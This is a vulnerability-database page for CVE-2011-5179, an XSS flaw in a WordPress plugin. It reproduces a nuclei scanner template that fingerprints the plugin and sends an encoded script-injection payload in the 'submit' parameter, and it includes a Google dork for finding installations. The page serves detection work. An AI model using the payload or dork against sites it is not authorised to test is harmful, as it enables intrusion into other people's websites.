Lucene search
K

Skysa App Bar 1.04 - Cross-Site Scripting

🗓️ 17 Jun 2026 05:14:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Skysa App Bar 1.04 - Cross-Site Scripting vulnerability in WordPress plugi

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-5179
28 Nov 201100:00
circl
CVE
CVE-2011-5179
20 Sep 201210:00
cve
Cvelist
CVE-2011-5179
20 Sep 201210:00
cvelist
EUVD
EUVD-2011-5079
7 Oct 202500:30
euvd
NVD
CVE-2011-5179
20 Sep 201210:55
nvd
Patchstack
WordPress Skysa App Bar Plugin - Cross Site Scripting
28 Nov 201100:00
patchstack
Prion
Cross site scripting
20 Sep 201210:55
prion
id: CVE-2011-5179

info:
  name: Skysa App Bar 1.04 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Skysa App Bar or apply appropriate security controls to sanitize user input and prevent XSS attacks.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-5179
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71486
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2011-5179
    cwe-id: CWE-79
    epss-score: 0.08772
    epss-percentile: 0.94485
    cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: skysa
    product: "skysa_app_bar_integration_plugin"
    google-query: "inurl:\"/wp-content/plugins/skysa-official/\""
  tags: cve,cve2011,wordpress,xss,wp-plugin,skysa,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Skysa App'

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100971af97c688f50cab8fb1ea375be498bda03fec5c4ba3091f40f47402a378575022100fce2b158356a269fc65bc292fe77b3d2e3bc23b0d32d549731e8c29df8bd5c5c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.08772
30